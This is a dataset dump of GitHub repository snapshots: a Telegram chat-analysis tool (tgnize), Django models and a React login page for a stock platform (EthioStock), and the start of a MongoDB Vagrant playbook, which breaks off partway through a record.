Dataset schema (column, dtype, observed stats):

| Column | Dtype | Stats |
|---|---|---|
| repo_name | string | lengths 5 to 114 |
| repo_url | string | lengths 24 to 133 |
| snapshot_id | string | lengths 40 to 40 |
| revision_id | string | lengths 40 to 40 |
| directory_id | string | lengths 40 to 40 |
| branch_name | string | 209 classes |
| visit_date | timestamp[ns] | |
| revision_date | timestamp[ns] | |
| committer_date | timestamp[ns] | |
| github_id | int64 | 9.83k to 683M |
| star_events_count | int64 | 0 to 22.6k |
| fork_events_count | int64 | 0 to 4.15k |
| gha_license_id | string | 17 classes |
| gha_created_at | timestamp[ns] | |
| gha_updated_at | timestamp[ns] | |
| gha_pushed_at | timestamp[ns] | |
| gha_language | string | 115 classes |
| files | list | lengths 1 to 13.2k |
| num_files | int64 | 1 to 13.2k |
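Rows with this schema are typically consumed through the Hugging Face `datasets` library. A minimal sketch, assuming that access path; the dataset identifier `"org/dataset-name"` is a placeholder, since this dump does not name the dataset:

```python
# Minimal sketch: stream a few rows of a dataset with the schema above.
# "org/dataset-name" is a hypothetical placeholder, not the real dataset id.
from itertools import islice

from datasets import load_dataset

ds = load_dataset("org/dataset-name", split="train", streaming=True)

for record in islice(ds, 3):
    # Scalar columns come back as plain Python values; `files` is a list of
    # dicts, one per blob in the repository snapshot.
    print(record["repo_name"], record["num_files"], record["star_events_count"])
```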
repo_name: AndydeCleyre/tgnize
repo_url: https://github.com/AndydeCleyre/tgnize
snapshot_id: 8bba5be72edd5d3b00234227f444ec3bb8f49df7
revision_id: 45dd2604841226499f9c5af185c4cc3835f9c0da
directory_id: a699018ea2146f5357b0ce791e840d64fb7baca0
branch_name: refs/heads/master
visit_date: 2020-09-16T05:28:43.665690
revision_date: 2019-11-23T18:03:42
committer_date: 2019-11-23T18:03:42
github_id: 223,667,214
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: 2019-11-23T23:31:29
gha_updated_at: 2019-11-23T18:03:59
gha_pushed_at: 2019-11-23T18:03:57
gha_language: null
files:
[ { "alpha_fraction": 0.6048902869224548, "alphanum_fraction": 0.6172303557395935, "avg_line_length": 32.922481536865234, "blob_id": "9b230edcf65adf359127006f54f63c04e285f27a", "content_id": "21a6437eddc5309076ca611d3e31ad8b469a5c64", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4376, "license_type": "permissive", "max_line_length": 275, "num_lines": 129, "path": "/app.py", "repo_name": "AndydeCleyre/tgnize", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\nfrom __future__ import annotations\nfrom typing import List, Tuple\nfrom functools import reduce\nfrom util import parseChat\nfrom plotting_scripts.minuteBasedAccumulatedTraffic import extractMinuteBasedTraffic, extractMinuteBasedTrafficByUser, plotAnimatedGraphForAccumulatedTrafficByMinuteFor24HourSpan\nfrom sys import argv\nfrom os import mkdir\nfrom os.path import abspath, exists, join\n\n'''\n Given sink directory path and target file name,\n it joins them into a single component & returns\n sink file path ( absolute )\n'''\n\ndef _getSinkFilePath(dirName: str, fileName: str) -> str:\n return join(abspath(dirName), fileName)\n\n'''\n Checks presence of sink directory on current machine,\n if doesn't exists, it builds so.\n'''\n\ndef _sinkDirBuilder(targetPath: str):\n _tmp = abspath(targetPath)\n if not exists(_tmp):\n mkdir(_tmp)\n\n'''\n Displays a simple banner, depicting usage of script,\n along with author name & repository address\n'''\n\ndef _displayBanner():\n print('\\x1b[1;6;36;49m[+]tgnize v0.1.1 - How about another Telegram Chat Analyzer ?\\x1b[0m\\n\\n\\t\\x1b[3;30;47m$ tgnize `path-to-exported-chat-dir` `path-to-sink-dir`\\x1b[0m\\n\\n[+]Author: Anjan Roy<[email protected]>\\n[+]Source: https://github.com/itzmeanjan/tgnize ( MIT Licensed )\\n')\n\n'''\n Retuns source directory path ( holding exported telegram chat data set ) &\n sink directory ( where we'll store generated plots )\n'''\n\ndef _handleCMDInput() -> Tuple[str, str]:\n return tuple(argv[1:len(argv)]) if len(argv) == 3 else (None, None)\n\n'''\n Escapes troublesome special characters present in chat participant's\n names, which might cause some issue, if we put it in generated plots ( animated )\n name\n'''\n\ndef _getEscapedName(proposedName: str) -> str:\n return proposedName.translate(\n proposedName.maketrans(\n {'/': r'_',\n '\\\\': r'_',\n ' ': r'_'\n }\n )\n )\n\n'''\n Calculates rate of success of execution of this script on\n exported chat data\n'''\n\ndef __calculateSuccess__(data: List[bool]) -> float:\n return reduce(lambda acc, cur: (acc + 1) if cur else acc, data, 0) / len(data) * 100\n\n\n'''\n Main entry point of script\n'''\n\n\ndef main() -> float:\n _result = []\n try:\n source, sink = _handleCMDInput()\n if not source or not sink or not exists(source):\n _displayBanner()\n raise Exception('Improper Invocation of `tgnize`')\n _sinkDirBuilder(sink)\n print('\\x1b[1;6;36;49m[+]tgnize v0.1.1 - How about another Telegram Chat Analyzer ?\\x1b[0m\\n[*]Working ...')\n # a reusable reference, which will be used, over lifetime of this script,\n chat = parseChat(source)\n # holding full chat, currently under consideration\n _result.append(\n plotAnimatedGraphForAccumulatedTrafficByMinuteFor24HourSpan(\n extractMinuteBasedTraffic(chat),\n 'Accumulated Chat Traffic by Minute',\n _getSinkFilePath(sink, 'accumulatedChatTrafficByMinute.gif')\n )\n )\n for i in chat.getTopXParticipants(5):\n _result.append(\n plotAnimatedGraphForAccumulatedTrafficByMinuteFor24HourSpan(\n 
extractMinuteBasedTrafficByUser(chat, i),\n 'Accumulated Chat Traffic by Minute for {}'.format(i),\n _getSinkFilePath(sink, 'accumulatedChatTrafficByMinuteFor{}.gif'.format(\n _getEscapedName(i)))\n )\n )\n '''\n for i in chat.users:\n _result.append(\n plotAnimatedGraphForAccumulatedTrafficByMinuteFor24HourSpan(\n extractMinuteBasedTrafficByUser(chat, i.name),\n 'Accumulated Chat Traffic by Minute for {}'.format(\n i.name[:8] + '...' if len(i.name) > 10 else i.name),\n './plots/accumulatedChatTrafficByMinuteFor{}.gif'.format(\n _getEscapedName(i.name))\n )\n )\n '''\n except Exception as e:\n print('[!]Error : {}'.format(e))\n finally:\n return __calculateSuccess__(_result)\n\n\nif __name__ == '__main__':\n try:\n print('[+]Success : {:.2f} %'.format(main()))\n except KeyboardInterrupt:\n print('\\n[!]Terminated')\n finally:\n exit(0)\n" }, { "alpha_fraction": 0.5178571343421936, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 17.66666603088379, "blob_id": "30dc720c18b77913202c0a6c8f8c6754b86a1f4c", "content_id": "f27b58f7be52329a6cac3f75bec5d30dd48d28c7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 56, "license_type": "permissive", "max_line_length": 21, "num_lines": 3, "path": "/requirements.txt", "repo_name": "AndydeCleyre/tgnize", "src_encoding": "UTF-8", "text": "matplotlib==3.0.2\ntyping==3.7.4.1\nbeautifulsoup4==4.8.1\n" }, { "alpha_fraction": 0.6167401075363159, "alphanum_fraction": 0.7092511057853699, "avg_line_length": 74.66666412353516, "blob_id": "6abd001c83ead9019b3c4dad8687ef45a8ba8210", "content_id": "eb2e94101bb88260c4a3032d9cac9e561c321c13", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 227, "license_type": "permissive", "max_line_length": 177, "num_lines": 3, "path": "/install", "repo_name": "AndydeCleyre/tgnize", "src_encoding": "UTF-8", "text": "#!/usr/bin/bash\npip3 install -r requirements.txt\necho -en \"\\n\\n\\x1b[6;30;47m[+]Append \\x1b[6;30;41m$PWD\\x1b[6;30;47m , to your system PATH\\n[+]Now on you can invoke $ tgnize path-to-exported-chat-dir path-to-sink-dir\\n\\x1b[0m\"\n" }, { "alpha_fraction": 0.6732824444770813, "alphanum_fraction": 0.6809160113334656, "avg_line_length": 27.478260040283203, "blob_id": "ca37ffc81111ad0ca78f80801a233ff70525b13c", "content_id": "438376cb18b0bca106087fc3d86f78cbe4e65473", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 655, "license_type": "permissive", "max_line_length": 85, "num_lines": 23, "path": "/plotting_scripts/messageCount.py", "repo_name": "AndydeCleyre/tgnize", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\nfrom __future__ import annotations\nfrom model.chat import Chat\nfrom typing import Dict\n\n'''\n Returns a mapping of all those Users\n who're top contributors in this Chat,\n along with their percentage of contribution\n in terms of number of messages sent\n'''\n\ndef getTopXParticipantsAlongWithContribution(x: int, chat: Chat) -> Dict[str, float]:\n _tmp = chat.totalMessageCount\n return dict(map(lambda e: (e, chat.getUser(e).totalMessageCount / _tmp * 100),\n chat.getTopXParticipants(x)))\n\n\n\nif __name__ == '__main__':\n print('[!]This module is designed to be used as a backend handler')\n exit(0)\n" }, { "alpha_fraction": 0.5957446694374084, "alphanum_fraction": 0.6382978558540344, "avg_line_length": 22.5, "blob_id": "2a284f8ec8e6f5a95a78ebf70444924262cf60e0", "content_id": 
"14a887c07c6027fea96742b27a0b605bdd98fcac", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 47, "license_type": "permissive", "max_line_length": 30, "num_lines": 2, "path": "/tgnize", "repo_name": "AndydeCleyre/tgnize", "src_encoding": "UTF-8", "text": "#!/usr/bin/bash\npython3 `dirname $0`/app.py $@\n" }, { "alpha_fraction": 0.7161172032356262, "alphanum_fraction": 0.7277722358703613, "avg_line_length": 45.55813980102539, "blob_id": "7c0dddff5206b5f87cc10987bf42966266c2b4ef", "content_id": "47bcdb1b2b1caf83fe455ddc6cc0482187b2f43d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6176, "license_type": "permissive", "max_line_length": 314, "num_lines": 129, "path": "/README.md", "repo_name": "AndydeCleyre/tgnize", "src_encoding": "UTF-8", "text": "# tgnize\n\n![accumulatedChatTrafficByMinuteOfDevsChatGroupTelegram](./plots/accumulatedChatTrafficByMinute.gif)\n\nHow about another exported Telegram Chat analyzer ? :wink:\n\n## nomenclature\nTelegram + _( Chat )_ Analyze = tgnize\n\n## motivation\n- I'm always interested in learning more about data, which is why I thought about taking a deeper look into Telegram Chats _( mostly groups )_, I participate in.\n- I exported chat data _( excluding audios, videos and images etc. )_, of [Devs Chat](https://t.me/joinchat/BkBvqUQUj4VKPmFSSNPQSw) group, using Telegram Desktop Client, which are nothing but some HTML, CSS & JS files\n- I created an object model, into which I populated parsed Chat data, so that I can manipulate it well\n- Then I started plotting animated charts & much more _( a lot of work remaining though )_, to depict how participants contributed to chat\n- It also lets me understand my chat activity pattern(s) i.e. in which hour of the day I'm mostly active / inactive in Chat\n- Or how another peer is spending their time is Chat\n- What's mostly used words / mostly used bots / mostly used Emoji etc. in Chat\n\n## caution\nThis project doesn't expect you to use any exported Chat for manipulating any participant or use extracted data _( sleep patterns, daily activity pattern of participants )_ for doing some harmful activity to any participant.\n\n**If users use it for malicious purpose(s), it's not author's responsibility !!!**\n\nI suggest you not to use it for manipulating someone else. Thank you for understanding :wink:\n\n## data source\nHere I'm using [Devs Chat](https://t.me/joinchat/BkBvqUQUj4VKPmFSSNPQSw)'s, exported Chat data set for testing these scripts. So all plots ( to be :wink: ) generated, present in this repository, are result of application of scripts on [Devs Chat](https://t.me/joinchat/BkBvqUQUj4VKPmFSSNPQSw)'s exported Chat data.\n\n~Template data set is present [here](.). It holds all messages of [Devs Chat](https://t.me/joinchat/BkBvqUQUj4VKPmFSSNPQSw) upto _03/11/2019_ from initialization of group.~\n\n**For respecting privacy of all users, I'm removing that data source from this public repo. Export chat data for your own need.**\n\n### exporting chat\nFor exporting chat data for [Devs Chat](https://t.me/joinchat/BkBvqUQUj4VKPmFSSNPQSw) group of Telegram, I used Official Telegram Desktop Client. 
Exporting was done, while only including text messages _( no images, videos or audios )_, which are nothing but a bunch of HTML files.\n\nIf you want to run these scripts on your machine, make sure you've Telegram Desktop Client installed.\n\n```shell script\n$ sudo snap install telegram-desktop # run on your linux terminal\n```\nLog into your account and choose which chat to export. Well this expoting procedure can take some time, depending upon age & activeness of Chat.\n\n## usage\n- Download this zip from [here](https://github.com/itzmeanjan/tgnize/releases)\n- Unzip it into a suitable directory on your machine\n- Get into `tgnize` directory\n\n```shell script\n$ cd tgnize\n$ tree -h\n.\n├── [4.2K] app.py\n├── [4.0K] docs\n│   └── [1.8K] minuteBasedAccumulatedTraffic.md\n├── [ 227] install\n├── [1.0K] LICENSE\n├── [4.0K] model\n│   ├── [ 245] activity.py\n│   ├── [9.8K] chat.py\n│   ├── [ 332] event.py\n│   ├── [ 100] __init__.py\n│   ├── [1.3K] message.py\n│   ├── [ 515] plotDataRange.py\n│   └── [1.1K] user.py\n├── [4.0K] plotting_scripts\n│   ├── [ 100] __init__.py\n│   ├── [ 169] messageCount.py\n│   └── [ 11K] minuteBasedAccumulatedTraffic.py\n├── [2.7K] README.md\n├── [ 56] requirements.txt\n├── [ 47] tgnize\n└── [4.4K] util.py\n\n3 directories, 18 files\n```\n- Make sure you've `python3-pip` installed, which will be required for installing python modules ( i.e. beautifulsoup4, matplotlib etc. )\n- Run `install` script ( BASH script ), which will download all required dependencies into your machine\n\n```shell script\n$ ./install\n```\n- For generating animated plots, you'll need to have `imagemagick` installed on your machine. Install it using your system package manager.\n\n```shell script\n$ sudo apt-get install imagemagick # for debian based distros\n$ sudo dnf install imagemagick # for fedora\n```\n- Now you need to add installation path of `tgnize`, into your **PATH** variable\n\n```shell script\n$ pwd # copy it\n```\n- If you're on BASH, find `.bashrc` under your home directory, if not found create a file with that name\n- Add follwing line at end of that file, while replacing `paste-here` section with installation path of `tgnize`\n\n```shell script\nexport PATH=\"$PATH:paste-here\"\n```\n- Now close this terminal window & open a new one\n- You'll have `tgnize`, executable BASH script present under downloaded zip, on your path. Simply invoke `tgnize` directly, to be sure things are working as they're supposed to be\n\n```shell script\n$ cd # get to home directory\n$ tgnize\n[+]tgnize v0.1.0 - How about another Telegram Chat Analyzer ?\n\n\t$ tgnize `path-to-exported-chat-dir` `path-to-sink-dir`\n\n[+]Author: Anjan Roy<[email protected]>\n[+]Source: https://github.com/itzmeanjan/tgnize ( MIT Licensed )\n\n[!]Error : Improper Invocation of `tgnize`\n```\n- It's asking you to properly invoke script, by giving source directory _( holding exported telegram chat, of a single Chat, may be a lot of files in case of large Chats )_ & sink directory _( will hold generated plots / charts )_\n- If you've already exported some Telegram chat, consider invoking this script, to understand how you spent your time in Chat\n\n## progress\n\n**This project is in its infancy, a lot of features to be added. 
If you've something in your mind, don't hesitate to create an issue or make a PR**\n\n- [x] [Depiction of Accumulated Chat Traffic _( for whole Chat along with top **X** chat participants )_](./docs/minuteBasedAccumulatedTraffic.md)\n- [ ] Contribution of Chat Participants to Chat\n- [ ] Overall Activity of Chat _( for a specified period of time )_\n- [ ] Emoji Analysis\n- [ ] Text Analysis\n\n_Got some new idea ? Make a PR_ :wink:\n\n**Work in Progress** - _coming with more details soon_\n" } ]
num_files: 6
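Each entry in a record's `files` list is a dict carrying the blob text plus per-file metadata (`path`, `text`, `language`, `src_encoding`, `length_bytes`, and so on, as visible above). A minimal sketch of rebuilding one repository snapshot on disk from such a record, assuming only those keys; the helper name `materialize` is ours, not part of any library:

```python
# Minimal sketch: write a record's `files` list back out as a directory tree.
# Assumes each file dict has the "path", "text", and "src_encoding" keys
# observed in the rows above; `materialize` is a hypothetical helper name.
import os

def materialize(record: dict, out_dir: str) -> None:
    for blob in record["files"]:
        # Paths in the dataset are repo-rooted (e.g. "/app.py"); strip the
        # leading slash so os.path.join treats them as relative.
        dest = os.path.join(out_dir, blob["path"].lstrip("/"))
        parent = os.path.dirname(dest)
        if parent:
            os.makedirs(parent, exist_ok=True)
        with open(dest, "w", encoding=blob.get("src_encoding", "UTF-8")) as fh:
            fh.write(blob["text"])
```

Called as `materialize(record, "./tgnize")` on the row above, this would recreate the six files listed in its `files` column.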
repo_name: Hilina-Ayalew/EthioStock
repo_url: https://github.com/Hilina-Ayalew/EthioStock
snapshot_id: 2654b717f110de1d4032c584fc11437fae2b4b48
revision_id: 3a7837239f4efafc0a72d82e0b9cfc953f8edb8e
directory_id: cdb9fc0588ae787c5df6a6f69fd53183e6662591
branch_name: refs/heads/master
visit_date: 2023-03-13T02:21:29.197040
revision_date: 2020-02-25T08:40:19
committer_date: 2020-02-25T08:40:19
github_id: 344,048,539
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.6753246784210205, "alphanum_fraction": 0.6753246784210205, "avg_line_length": 27.9375, "blob_id": "1ff80808dde0aefd564cbe470f35427a4cb08701", "content_id": "3488745b60b06adacb5e1f53ed24563a20a29b87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 462, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/backend/EthioStock/userreport/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom investor.models import InvestorModel\n\nclass UserReportModel(models.Model):\n reportedBy = models.ForeignKey(\n InvestorModel,\n related_name=\"investorId\", \n on_delete = models.DO_NOTHING\n )\n reportedUserId = models.ForeignKey(\n InvestorModel,\n related_name=\"investorId\", \n on_delete = models.DO_NOTHING\n )\n reason = models.TextField()\n reportCount = models.IntegerField()" }, { "alpha_fraction": 0.6898733973503113, "alphanum_fraction": 0.702531635761261, "avg_line_length": 38.5625, "blob_id": "7e967d873994d4e5e46424130ae5794837c8838b", "content_id": "cb65514616d7ec94a853c7059fcfefbef7e652e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 632, "license_type": "no_license", "max_line_length": 58, "num_lines": 16, "path": "/backend/EthioStock/investor/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\n\nclass InvestorModel(models.Model):\n GENDER = (('F','Female'), ('M','Male'))\n investorId = models.AutoField(primary_key = True)\n username = models.CharField(unique=True)\n firstName = models.CharField(max_length=30)\n lastName = models.CharField(max_length=30)\n phoneNo = models.CharField()\n sex = models.CharField(choices = GENDER)\n email = models.CharField()\n subcity = models.CharField()\n woreda = models.CharField()\n password = models.CharField(max_length=20)\n nationality = models.CharField(max_length=20)\n registerDate = models.DateTimeField(auto_now_add=True)" }, { "alpha_fraction": 0.6988763809204102, "alphanum_fraction": 0.6988763809204102, "avg_line_length": 28.66666603088379, "blob_id": "e1825d769b478947486e83edb5aea4cc6b8d1db6", "content_id": "b328f3d29d26f0b9bc1d76ac8cba89ab897ebed5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 445, "license_type": "no_license", "max_line_length": 51, "num_lines": 15, "path": "/backend/EthioStock/watchlist/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom businessowner.models import BusinessOwnerModel\nfrom investor.models import InvestorModel\n\nclass WatchlistModel(models.Model):\n ownerId = models.ForeignKey(\n InvestorModel,\n related_name=\"investorId\", \n on_delete = models.DO_NOTHING\n )\n businessId = models.ForeignKey(\n BusinessOwnerModel,\n related_name=\"businessOwnerId\", \n on_delete = models.DO_NOTHING\n )\n" }, { "alpha_fraction": 0.7065368294715881, "alphanum_fraction": 0.7079277038574219, "avg_line_length": 30.30434799194336, "blob_id": "0e034d2832b1c4c427dffad843a780b09f6b2376", "content_id": "c94656b821229514a454ec70ebc6105d7f9e6232", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 719, "license_type": "no_license", "max_line_length": 54, "num_lines": 23, "path": "/backend/EthioStock/soldstock/models.py", "repo_name": 
"Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom stock.models import StockModel\nfrom investor.models import InvestorModel\nfrom businessowner.models import BusinessOwnerModel\n\nclass SoldStockLedgerModel(models.Model):\n stockId = models.ForeignKey(\n StockModel,\n related_name=\"businessOwnerId\",\n on_delete=models.DO_NOTHING\n )\n investorId = models.ForeignKey(\n InvestorModel,\n related_name=\"businessOwnerId\",\n on_delete=models.DO_NOTHING\n )\n totalPrice = models.DecimalField(decimal_places=2)\n numberOfStock = models.IntegerField()\n sellerId = models.ForeignKey(\n BusinessOwnerModel,\n related_name=\"businessOwnerId\",\n on_delete=models.DO_NOTHING\n )" }, { "alpha_fraction": 0.7119815945625305, "alphanum_fraction": 0.7119815945625305, "avg_line_length": 28, "blob_id": "fca27742e15a84c703ae76dbddc44f7f3140d056", "content_id": "de1ace9bd47b2b12f578c8a33fa420427cdccd5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 434, "license_type": "no_license", "max_line_length": 51, "num_lines": 15, "path": "/backend/EthioStock/follower/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom businessowner.models import BusinessOwnerModel\nfrom investor.models import InvestorModel\n\nclass FollowerModel(models.Model):\n businessId = models.ForeignKey(\n BusinessOwnerModel,\n related_name=\"businessOwnerId\",\n on_delete=models.CASCADE\n )\n investorId = models.ForeignKey(\n InvestorModel,\n related_name=\"investorId\",\n on_delete=models.CASCADE\n )" }, { "alpha_fraction": 0.7106017470359802, "alphanum_fraction": 0.7106017470359802, "avg_line_length": 28.16666603088379, "blob_id": "ad017f063f29eec289488e5ba52a6866b95ec8d4", "content_id": "74fb0ea7f040c7badcd91b1de7ccd93b3e7b561a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 349, "license_type": "no_license", "max_line_length": 42, "num_lines": 12, "path": "/backend/EthioStock/prediction/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom stock.models import StockModel\n\nclass PredictionModel(models.Model):\n stockID = models.ForeignKey(\n StockModel,\n related_name=\"stockId\",\n on_delete=models.CASCADE\n )\n predictedPrice = models.DecimalField()\n actualPrice = models.DecimalField()\n predictionDate = models.DateField()" }, { "alpha_fraction": 0.6851851940155029, "alphanum_fraction": 0.6851851940155029, "avg_line_length": 26.08333396911621, "blob_id": "39bcfc44233a90663280cf16873d8af778a63918", "content_id": "8a0ea79c103d5b985d752d0089481db34d04796d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 324, "license_type": "no_license", "max_line_length": 41, "num_lines": 12, "path": "/backend/EthioStock/reaction/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom investor.models import InvestorModel\n\nclass Reaction(models.Model):\n postId = id\n investorId = models.ForeignKey(\n InvestorModel,\n related_name=\"investorId\", \n on_delete = models.DO_NOTHING\n )\n isLike = models.BooleanField()\n comment = models.TextField()" }, { "alpha_fraction": 0.6904109716415405, "alphanum_fraction": 0.6904109716415405, "avg_line_length": 29.5, "blob_id": "80c8eb3b1e5b8c2577210c34edf9368213b814be", "content_id": 
"d7507d2676d4d7b24cff08f29991122eb7b077fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 365, "license_type": "no_license", "max_line_length": 39, "num_lines": 12, "path": "/backend/EthioStock/businessowner/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\n\nclass BusinessOwnerModel(models.Model):\n businessOwnerId = id\n name = models.CharField()\n ownerPhone = models.CharField()\n password = models.CharField()\n website = models.CharField()\n category = models.CharField()\n email = models.CharField()\n subCity = models.CharField()\n legality = models.CharField()" }, { "alpha_fraction": 0.7039999961853027, "alphanum_fraction": 0.7039999961853027, "avg_line_length": 27.923076629638672, "blob_id": "18cd8189beacc29827d61200ae3d6dd5da1d0846", "content_id": "dbab422e753eff5d408d9faafde6e5f2ce5fa4c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 375, "license_type": "no_license", "max_line_length": 51, "num_lines": 13, "path": "/backend/EthioStock/post/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom businessowner.models import BusinessOwnerModel\n\nclass PostModel(models.Model):\n postId = id\n ownerId = models.ForeignKey(\n BusinessOwnerModel,\n related_name=\"businessOwnerId\",\n on_delete=models.DO_NOTHING\n )\n description =models.TextField()\n image = [models.ImageField()]\n date = models.DateTimeField()" }, { "alpha_fraction": 0.7018739581108093, "alphanum_fraction": 0.7018739581108093, "avg_line_length": 29.947368621826172, "blob_id": "721544a0c63c5fc50814123145714caa9745c9a9", "content_id": "0f50b2c2e6be8626fab1de3acb1146415ae759de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 587, "license_type": "no_license", "max_line_length": 51, "num_lines": 19, "path": "/backend/EthioStock/stock/models.py", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom businessowner.models import BusinessOwnerModel\n\nclass StockModel(models.Model):\n stockId = id\n ownerID = models.CharField()\n price = models.CharField()\n closingDate = models.DateField()\n openingDate = models.DateField()\n description = models.TextField()\n noOfStock = models.IntegerField()\n approved = models.BooleanField()\n sells = models.DecimalField()\n buys = models.DecimalField()\n ownerID = models.ForeignKey(\n BusinessOwnerModel,\n related_name=\"businessOwnerId\",\n on_delete=models.CASCADE\n )" }, { "alpha_fraction": 0.5395495295524597, "alphanum_fraction": 0.5405972003936768, "avg_line_length": 27.939393997192383, "blob_id": "968c0bee77fbdff6fa4abc751bb8f29a8972a648", "content_id": "22d03ae77a04205a43eee5d139dc992894d8743b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1909, "license_type": "no_license", "max_line_length": 132, "num_lines": 66, "path": "/frontend/src/components/Login.js", "repo_name": "Hilina-Ayalew/EthioStock", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport LoginSignupHeader from './LoginSignupHeader';\nimport '../styles/styles.scss';\nimport { Icon } from 'antd';\nimport SignupPage from './Signup'\nimport ReactDOM from 'react-dom';\n\nclass LoginPage extends React.Component{\n authenticate(){\n\n }\n \n redirectToSignup(){\n 
ReactDOM.render(<SignupPage />, document.getElementById('root'));\n }\n \n render(){\n return(\n <div className = \"login-container \">\n \n <LoginSignupHeader/>\n <div className = \"login-flex-container\">\n\n <div className = \"login-signup-left-side\">\n <p><span className = \"icon\"><Icon type = \"stock\"/></span>Data analysis and price prediction</p>\n <p><span className = \"icon\"><Icon type=\"file-done\" /></span>Have watchlists</p>\n <p><span className = \"icon\"><Icon type=\"dollar\" /></span>Apply for stocks and manage your application</p>\n <p><span className = \"icon\"><Icon type=\"reconciliation\" /></span>Submit applications through dynamic forms</p> \n </div>\n\n <div className = \"login-signup-right-side login-form\">\n <h1>Login</h1>\n <form onSubmit={this.authenticate}>\n <div>\n <Icon type = \"user\" className =\"input-icon\"/>\n <input type=\"text\" placeholder=\"username or email\" name=\"username\"/><br/><br/>\n \n </div>\n <div>\n <Icon type = \"key\" className =\"input-icon\"/>\n <input type=\"password\" placeholder = \"password\" name=\"password\"/><br/>\n \n </div>\n\n <button \n className = \"signup-link\"\n onClick = {this.redirectToSignup}\n >Signup?</button>\n <input type=\"submit\"/>\n </form>\n </div>\n\n\n\n </div>\n \n\n\n\n\n </div>\n );\n }\n}\n\nexport default LoginPage;" } ]
num_files: 11
repo_name: kita-atsushi/playbook_mongodb
repo_url: https://github.com/kita-atsushi/playbook_mongodb
snapshot_id: ad63aa4fdca2bf14380205c8547eca971d1650fd
revision_id: dbc8557d7bdd2bc2e9d5803edef478744cf4a45b
directory_id: c5426620fb9e54f56d8c12a76a8d7db7418a290d
branch_name: refs/heads/master
visit_date: 2021-05-11T10:58:27.098619
revision_date: 2018-06-12T14:08:36
committer_date: 2018-06-12T14:08:36
github_id: 118,118,279
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.7397260069847107, "alphanum_fraction": 0.8219178318977356, "avg_line_length": 35, "blob_id": "d22556fec90d8a6c4f00403695080b6513555664", "content_id": "3197fcce053c457d38c022c96df64eefc4634479", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 73, "license_type": "no_license", "max_line_length": 39, "num_lines": 2, "path": "/relaunch.sh", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "vagrant destroy -f mongo1 mongo2 mongo3\nvagrant up mongo1 mongo2 mongo3\n\n" }, { "alpha_fraction": 0.6230366230010986, "alphanum_fraction": 0.7696335315704346, "avg_line_length": 26.285715103149414, "blob_id": "e17733362371ee51c544bbc03611573d8292fc6e", "content_id": "f601fbecbfd0271cd94c0a4a2b0d41019d237ea3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 191, "license_type": "no_license", "max_line_length": 87, "num_lines": 7, "path": "/tools/client_example/client.ini", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "[con]\nmongo_url = mongodb://admin:123456@mongo1:27017,mongo2:27017/admin?replicaSet=mongo_rep\n\n[insert]\nbulk_max_count = 300000\nw_concern_opt = majority\nw_concern_repl_timeout_milisec = 3000\n" }, { "alpha_fraction": 0.7542579174041748, "alphanum_fraction": 0.7591241002082825, "avg_line_length": 23.176469802856445, "blob_id": "6fea2d20698c047c210d798fec5aee8a5a050042", "content_id": "1de4c2ca4c96f3476cb2201fceb9df010c160f64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 411, "license_type": "no_license", "max_line_length": 55, "num_lines": 17, "path": 